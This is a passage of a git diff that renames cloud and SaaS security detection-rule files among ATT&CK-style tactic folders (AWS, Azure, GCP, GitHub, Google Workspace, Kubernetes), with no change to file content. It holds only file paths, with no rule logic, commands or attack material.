rename from rules/integrations/aws/defense_evasion_iam_deactivate_mfa_device.toml
rename to rules/integrations/aws/impact_iam_deactivate_mfa_device.toml
diff --git a/rules/integrations/aws/defense_evasion_rds_instance_cluster_deletion_protection_disabled.toml b/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_rds_instance_cluster_deletion_protection_disabled.toml
rename to rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml
diff --git a/rules/integrations/aws/persistence_ec2_instance_connect_ssh_public_key_uploaded.toml b/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml
similarity index 100%
rename from rules/integrations/aws/persistence_ec2_instance_connect_ssh_public_key_uploaded.toml
rename to rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml
diff --git a/rules/integrations/aws/initial_access_ec2_instance_console_login.toml b/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml
similarity index 100%
rename from rules/integrations/aws/initial_access_ec2_instance_console_login.toml
rename to rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml
diff --git a/rules/integrations/aws/exfiltration_sns_topic_message_publish_by_rare_user.toml b/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml
similarity index 100%
rename from rules/integrations/aws/exfiltration_sns_topic_message_publish_by_rare_user.toml
rename to rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml
diff --git a/rules/integrations/aws/defense_evasion_ec2_network_acl_creation.toml b/rules/integrations/aws/persistence_ec2_network_acl_creation.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_ec2_network_acl_creation.toml
rename to rules/integrations/aws/persistence_ec2_network_acl_creation.toml
diff --git a/rules/integrations/aws/defense_evasion_ec2_route_table_modified_or_deleted.toml b/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_ec2_route_table_modified_or_deleted.toml
rename to rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml
diff --git a/rules/integrations/aws/defense_evasion_ec2_security_group_configuration_change_detection.toml b/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_ec2_security_group_configuration_change_detection.toml
rename to rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml
diff --git a/rules/integrations/aws/defense_evasion_iam_api_calls_via_user_session_token.toml b/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_iam_api_calls_via_user_session_token.toml
rename to rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml
diff --git a/rules/integrations/aws/privilege_escalation_iam_oidc_provider_created.toml b/rules/integrations/aws/persistence_iam_oidc_provider_created.toml
similarity index 100%
rename from rules/integrations/aws/privilege_escalation_iam_oidc_provider_created.toml
rename to rules/integrations/aws/persistence_iam_oidc_provider_created.toml
diff --git a/rules/integrations/aws/defense_evasion_lambda_backdoor_invoke_function_for_any_principal.toml b/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_lambda_backdoor_invoke_function_for_any_principal.toml
rename to rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml
diff --git a/rules/integrations/aws/defense_evasion_rds_instance_made_public.toml b/rules/integrations/aws/persistence_rds_instance_made_public.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_rds_instance_made_public.toml
rename to rules/integrations/aws/persistence_rds_instance_made_public.toml
diff --git a/rules/integrations/aws/defense_evasion_route_53_domain_transfer_lock_disabled.toml b/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_route_53_domain_transfer_lock_disabled.toml
rename to rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml
diff --git a/rules/integrations/aws/resource_development_route_53_domain_transferred_to_another_account.toml b/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml
similarity index 100%
rename from rules/integrations/aws/resource_development_route_53_domain_transferred_to_another_account.toml
rename to rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml
diff --git a/rules/integrations/aws/defense_evasion_route_53_hosted_zone_associated_with_a_vpc.toml b/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_route_53_hosted_zone_associated_with_a_vpc.toml
rename to rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml
diff --git a/rules/integrations/aws/defense_evasion_route_table_created.toml b/rules/integrations/aws/persistence_route_table_created.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_route_table_created.toml
rename to rules/integrations/aws/persistence_route_table_created.toml
diff --git a/rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_group.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml
similarity index 100%
rename from rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_group.toml
rename to rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml
diff --git a/rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml
similarity index 100%
rename from rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_role.toml
rename to rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml
diff --git a/rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_user.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml
similarity index 100%
rename from rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_user.toml
rename to rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml
diff --git a/rules/integrations/aws/persistence_iam_customer_managed_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml
similarity index 100%
rename from rules/integrations/aws/persistence_iam_customer_managed_policy_attached_to_role.toml
rename to rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml
diff --git a/rules/integrations/aws/defense_evasion_iam_saml_provider_updated.toml b/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml
similarity index 100%
rename from rules/integrations/aws/defense_evasion_iam_saml_provider_updated.toml
rename to rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml
diff --git a/rules/integrations/aws/persistence_iam_update_assume_role_policy.toml b/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml
similarity index 100%
rename from rules/integrations/aws/persistence_iam_update_assume_role_policy.toml
rename to rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml
diff --git a/rules/integrations/aws/persistence_sts_role_chaining.toml b/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml
similarity index 100%
rename from rules/integrations/aws/persistence_sts_role_chaining.toml
rename to rules/integrations/aws/privilege_escalation_sts_role_chaining.toml
diff --git a/rules/integrations/aws/impact_sns_topic_created_by_rare_user.toml b/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml
similarity index 100%
rename from rules/integrations/aws/impact_sns_topic_created_by_rare_user.toml
rename to rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml
diff --git a/rules/integrations/azure/collection_key_vault_excessive_retrieval.toml b/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml
similarity index 100%
rename from rules/integrations/azure/collection_key_vault_excessive_retrieval.toml
rename to rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml
diff --git a/rules/integrations/azure/persistence_storage_account_key_regenerated.toml b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml
similarity index 100%
rename from rules/integrations/azure/persistence_storage_account_key_regenerated.toml
rename to rules/integrations/azure/credential_access_storage_account_key_regenerated.toml
diff --git a/rules/integrations/azure/credential_access_entra_id_teamfiltration_user_agents_detected.toml b/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml
similarity index 100%
rename from rules/integrations/azure/credential_access_entra_id_teamfiltration_user_agents_detected.toml
rename to rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml
diff --git a/rules/integrations/azure/defense_evasion_storage_blob_container_access_modification.toml b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml
similarity index 100%
rename from rules/integrations/azure/defense_evasion_storage_blob_container_access_modification.toml
rename to rules/integrations/azure/discovery_storage_blob_container_access_modification.toml
diff --git a/rules/integrations/azure/collection_azure_storage_blob_download_azcopy_sas_token.toml b/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml
similarity index 100%
rename from rules/integrations/azure/collection_azure_storage_blob_download_azcopy_sas_token.toml
rename to rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml
diff --git a/rules/integrations/azure/credential_access_azure_arc_cluster_credential_access_unusual_source.toml b/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml
similarity index 100%
rename from rules/integrations/azure/credential_access_azure_arc_cluster_credential_access_unusual_source.toml
rename to rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml
diff --git a/rules/integrations/azure/defense_evasion_entra_id_actor_token_user_impersonation_abuse.toml b/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml
similarity index 100%
rename from rules/integrations/azure/defense_evasion_entra_id_actor_token_user_impersonation_abuse.toml
rename to rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml
diff --git a/rules/integrations/azure/defense_evasion_entra_id_device_code_auth_with_broker_client.toml b/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml
similarity index 100%
rename from rules/integrations/azure/defense_evasion_entra_id_device_code_auth_with_broker_client.toml
rename to rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml
diff --git a/rules/integrations/azure/persistence_entra_id_external_guest_user_invite.toml b/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml
similarity index 100%
rename from rules/integrations/azure/persistence_entra_id_external_guest_user_invite.toml
rename to rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml
diff --git a/rules/integrations/azure/defense_evasion_entra_id_federated_login_by_unusual_client.toml b/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml
similarity index 100%
rename from rules/integrations/azure/defense_evasion_entra_id_federated_login_by_unusual_client.toml
rename to rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml
diff --git a/rules/integrations/azure/defense_evasion_entra_id_graph_single_session_from_multiple_addresses.toml b/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml
similarity index 100%
rename from rules/integrations/azure/defense_evasion_entra_id_graph_single_session_from_multiple_addresses.toml
rename to rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml
diff --git a/rules/integrations/azure/credential_access_entra_id_illicit_consent_grant_via_registered_application.toml b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml
similarity index 100%
rename from rules/integrations/azure/credential_access_entra_id_illicit_consent_grant_via_registered_application.toml
rename to rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml
diff --git a/rules/integrations/azure/credential_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml
similarity index 100%
rename from rules/integrations/azure/credential_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml
rename to rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml
diff --git a/rules/integrations/azure/credential_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml
similarity index 100%
rename from rules/integrations/azure/credential_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml
rename to rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml
diff --git a/rules/integrations/azure/credential_access_entra_id_protection_sign_in_risk_detected.toml b/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml
similarity index 100%
rename from rules/integrations/azure/credential_access_entra_id_protection_sign_in_risk_detected.toml
rename to rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml
diff --git a/rules/integrations/azure/defense_evasion_entra_id_rare_app_id_for_principal_auth.toml b/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml
similarity index 100%
rename from rules/integrations/azure/defense_evasion_entra_id_rare_app_id_for_principal_auth.toml
rename to rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml
diff --git a/rules/integrations/azure/credential_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml b/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml
similarity index 100%
rename from rules/integrations/azure/credential_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml
rename to rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml
diff --git a/rules/integrations/azure/defense_evasion_graph_first_occurrence_of_client_request.toml b/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml
similarity index 100%
rename from rules/integrations/azure/defense_evasion_graph_first_occurrence_of_client_request.toml
rename to rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml
diff --git a/rules/integrations/azure/defense_evasion_automation_account_created.toml b/rules/integrations/azure/persistence_automation_account_created.toml
similarity index 100%
rename from rules/integrations/azure/defense_evasion_automation_account_created.toml
rename to rules/integrations/azure/persistence_automation_account_created.toml
diff --git a/rules/integrations/azure/defense_evasion_entra_id_conditional_access_policy_modified.toml b/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml
similarity index 100%
rename from rules/integrations/azure/defense_evasion_entra_id_conditional_access_policy_modified.toml
rename to rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml
diff --git a/rules/integrations/azure/defense_evasion_entra_id_mfa_disabled_for_user.toml b/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml
similarity index 100%
rename from rules/integrations/azure/defense_evasion_entra_id_mfa_disabled_for_user.toml
rename to rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml
diff --git a/rules/integrations/azure/defense_evasion_entra_id_privileged_identity_management_role_modified.toml b/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml
similarity index 100%
rename from rules/integrations/azure/defense_evasion_entra_id_privileged_identity_management_role_modified.toml
rename to rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml
diff --git a/rules/integrations/azure/defense_evasion_entra_id_tenant_domain_federation_via_audit_logs.toml b/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml
similarity index 100%
rename from rules/integrations/azure/defense_evasion_entra_id_tenant_domain_federation_via_audit_logs.toml
rename to rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml
diff --git a/rules/integrations/azure/initial_access_entra_id_user_signed_in_from_unusual_device.toml b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml
similarity index 100%
rename from rules/integrations/azure/initial_access_entra_id_user_signed_in_from_unusual_device.toml
rename to rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml
diff --git a/rules/integrations/azure/defense_evasion_graph_eam_addition_or_modification.toml b/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml
similarity index 100%
rename from rules/integrations/azure/defense_evasion_graph_eam_addition_or_modification.toml
rename to rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml
diff --git a/rules/integrations/azure/persistence_azure_rbac_administrator_roles_assigned.toml b/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml
similarity index 100%
rename from rules/integrations/azure/persistence_azure_rbac_administrator_roles_assigned.toml
rename to rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml
diff --git a/rules/integrations/azure/persistence_entra_id_elevate_to_user_administrator_access.toml b/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml
similarity index 100%
rename from rules/integrations/azure/persistence_entra_id_elevate_to_user_administrator_access.toml
rename to rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml
diff --git a/rules/integrations/azure/persistence_kubernetes_aks_rolebinding_created.toml b/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml
similarity index 100%
rename from rules/integrations/azure/persistence_kubernetes_aks_rolebinding_created.toml
rename to rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml
diff --git a/rules/integrations/ded/command_and_control_ml_high_bytes_destination_port.toml b/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml
similarity index 100%
rename from rules/integrations/ded/command_and_control_ml_high_bytes_destination_port.toml
rename to rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml
diff --git a/rules/integrations/gcp/impact_gcp_pub_sub_subscription_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml
similarity index 100%
rename from rules/integrations/gcp/impact_gcp_pub_sub_subscription_deletion.toml
rename to rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml
diff --git a/rules/integrations/gcp/impact_gcp_pub_sub_topic_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml
similarity index 100%
rename from rules/integrations/gcp/impact_gcp_pub_sub_topic_deletion.toml
rename to rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml
diff --git a/rules/integrations/gcp/persistence_gcp_storage_bucket_permissions_modified.toml b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml
similarity index 100%
rename from rules/integrations/gcp/persistence_gcp_storage_bucket_permissions_modified.toml
rename to rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml
diff --git a/rules/integrations/gcp/impact_gcp_virtual_private_cloud_network_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml
similarity index 100%
rename from rules/integrations/gcp/impact_gcp_virtual_private_cloud_network_deleted.toml
rename to rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml
diff --git a/rules/integrations/gcp/defense_evasion_gcp_logging_sink_modification.toml b/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml
similarity index 100%
rename from rules/integrations/gcp/defense_evasion_gcp_logging_sink_modification.toml
rename to rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml
diff --git a/rules/integrations/gcp/persistence_gcp_iam_custom_role_creation.toml b/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml
similarity index 100%
rename from rules/integrations/gcp/persistence_gcp_iam_custom_role_creation.toml
rename to rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml
diff --git a/rules/integrations/gcp/impact_gcp_iam_service_account_key_deletion.toml b/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml
similarity index 100%
rename from rules/integrations/gcp/impact_gcp_iam_service_account_key_deletion.toml
rename to rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml
diff --git a/rules/integrations/github/defense_evasion_github_app_deleted.toml b/rules/integrations/github/execution_github_app_deleted.toml
similarity index 100%
rename from rules/integrations/github/defense_evasion_github_app_deleted.toml
rename to rules/integrations/github/execution_github_app_deleted.toml
diff --git a/rules/integrations/github/collection_github_high_number_of_cloned_repos_from_pat.toml b/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml
similarity index 100%
rename from rules/integrations/github/collection_github_high_number_of_cloned_repos_from_pat.toml
rename to rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml
diff --git a/rules/integrations/github/persistence_new_github_app_installed.toml b/rules/integrations/github/execution_new_github_app_installed.toml
similarity index 100%
rename from rules/integrations/github/persistence_new_github_app_installed.toml
rename to rules/integrations/github/execution_new_github_app_installed.toml
diff --git a/rules/integrations/github/collection_high_number_of_cloning_by_user.toml b/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml
similarity index 100%
rename from rules/integrations/github/collection_high_number_of_cloning_by_user.toml
rename to rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml
diff --git a/rules/integrations/github/collection_github_repository_activity_from_unusual_ip.toml b/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml
similarity index 100%
rename from rules/integrations/github/collection_github_repository_activity_from_unusual_ip.toml
rename to rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml
diff --git a/rules/integrations/github/impact_github_actions_bot_first_push_to_repo.toml b/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml
similarity index 100%
rename from rules/integrations/github/impact_github_actions_bot_first_push_to_repo.toml
rename to rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml
diff --git a/rules/integrations/google_workspace/exfiltration_google_drive_ownership_transferred_via_google_workspace.toml b/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml
similarity index 100%
rename from rules/integrations/google_workspace/exfiltration_google_drive_ownership_transferred_via_google_workspace.toml
rename to rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml
diff --git a/rules/integrations/google_workspace/collection_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml b/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml
similarity index 100%
rename from rules/integrations/google_workspace/collection_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml
rename to rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml
diff --git a/rules/integrations/google_workspace/credential_access_google_workspace_mfa_enforcement_disabled.toml b/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml
similarity index 100%
rename from rules/integrations/google_workspace/credential_access_google_workspace_mfa_enforcement_disabled.toml
rename to rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml
diff --git a/rules/integrations/google_workspace/persistence_external_user_added_to_google_workspace_group.toml b/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml
similarity index 100%
rename from rules/integrations/google_workspace/persistence_external_user_added_to_google_workspace_group.toml
rename to rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml
diff --git a/rules/integrations/google_workspace/persistence_google_workspace_suspended_user_renewed.toml b/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml
similarity index 100%
rename from rules/integrations/google_workspace/persistence_google_workspace_suspended_user_renewed.toml
rename to rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml
diff --git a/rules/integrations/google_workspace/execution_object_copied_to_external_drive_with_app_consent.toml b/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml
similarity index 100%
rename from rules/integrations/google_workspace/execution_object_copied_to_external_drive_with_app_consent.toml
rename to rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml
diff --git a/rules/integrations/google_workspace/defense_evasion_google_workspace_2sv_policy_disabled.toml b/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml
similarity index 100%
rename from rules/integrations/google_workspace/defense_evasion_google_workspace_2sv_policy_disabled.toml
rename to rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml
diff --git a/rules/integrations/google_workspace/defense_evasion_google_workspace_password_policy_modified.toml b/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml
similarity index 100%
rename from rules/integrations/google_workspace/defense_evasion_google_workspace_password_policy_modified.toml
rename to rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml
diff --git a/rules/integrations/google_workspace/defense_evasion_mfa_disabled_for_google_workspace_organization.toml b/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml
similarity index 100%
rename from rules/integrations/google_workspace/defense_evasion_mfa_disabled_for_google_workspace_organization.toml
rename to rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml
diff --git a/rules/integrations/kubernetes/defense_evasion_denied_service_account_request.toml b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml
similarity index 100%
rename from rules/integrations/kubernetes/defense_evasion_denied_service_account_request.toml
rename to rules/integrations/kubernetes/discovery_denied_service_account_request.toml
diff --git a/rules/integrations/kubernetes/privilege_escalation_forbidden_creation_request.toml b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml
similarity index 100%
rename from rules/integrations/kubernetes/privilege_escalation_forbidden_creation_request.toml
rename to rules/integrations/kubernetes/execution_forbidden_creation_request.toml
diff --git a/rules/integrations/kubernetes/discovery_forbidden_request_from_unsual_user_agent.toml b/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml
similarity index 100%
rename from rules/integrations/kubernetes/discovery_forbidden_request_from_unsual_user_agent.toml
rename to rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml
diff --git a/rules/integrations/kubernetes/discovery_unusual_request_response_by_user_agent.toml b/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml
similarity index 100%
rename from rules/integrations/kubernetes/discovery_unusual_request_response_by_user_agent.toml
rename to rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml
diff --git a/rules/integrations/kubernetes/initial_access_exposed_service_created_with_type_nodeport.toml b/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml
similarity index 100%
rename from rules/integrations/kubernetes/initial_access_exposed_service_created_with_type_nodeport.toml
rename to rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml
diff --git a/rules/integrations/kubernetes/execution_container_created_with_excessive_linux_capabilities.toml b/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml
similarity index 100%
rename from rules/integrations/kubernetes/execution_container_created_with_excessive_linux_capabilities.toml
rename to rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml
diff --git a/rules/integrations/kubernetes/execution_pod_created_with_hostipc.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml
similarity index 100%
rename from rules/integrations/kubernetes/execution_pod_created_with_hostipc.toml
rename to rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml
diff --git a/rules/integrations/kubernetes/execution_pod_created_with_hostnetwork.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml
similarity index 100%
rename from rules/integrations/kubernetes/execution_pod_created_with_hostnetwork.toml
rename to rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml
diff --git a/rules/integrations/kubernetes/execution_pod_created_with_hostpid.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml
similarity index 100%
rename from rules/integrations/kubernetes/execution_pod_created_with_hostpid.toml
rename to rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml
diff --git a/rules/integrations/kubernetes/execution_pod_created_with_sensitive_hostpath_volume.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml
similarity index 100%
rename from rules/integrations/kubernetes/execution_pod_created_with_sensitive_hostpath_volume.toml
rename to rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml
diff --git a/rules/integrations/kubernetes/execution_privileged_pod_created.toml b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml
similarity index 100%
rename from rules/integrations/kubernetes/execution_privileged_pod_created.toml
rename to rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml
diff --git a/rules/integrations/kubernetes/execution_sensitive_rbac_change_followed_by_workload_modification.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml
similarity index 100%
rename from rules/integrations/kubernetes/execution_sensitive_rbac_change_followed_by_workload_modification.toml
rename to rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml
diff --git a/rules/integrations/kubernetes/execution_sensitive_workload_modification_by_user_agent.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml
similarity index 100%
rename from rules/integrations/kubernetes/execution_sensitive_workload_modification_by_user_agent.toml
rename to rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml
diff --git a/rules/integrations/kubernetes/persistence_service_account_rbac_write_operation.toml b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml
similarity index 100%
rename from rules/integrations/kubernetes/persistence_service_account_rbac_write_operation.toml
rename to rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml
diff --git a/rules/integrations/kubernetes/execution_suspicious_assignment_of_controller_service_account.toml b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml
similarity index 100%
rename from rules/integrations/kubernetes/execution_suspicious_assignment_of_controller_service_account.toml
rename to rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml
diff --git a/rules/integrations/lmd/execution_ml_high_mean_rdp_process_args.toml b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml
similarity index 100%
rename from rules/integrations/lmd/execution_ml_high_mean_rdp_process_args.toml
rename to rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml
diff --git a/rules/integrations/lmd/exfiltration_ml_spike_in_remote_file_transfers.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml
similarity index 100%
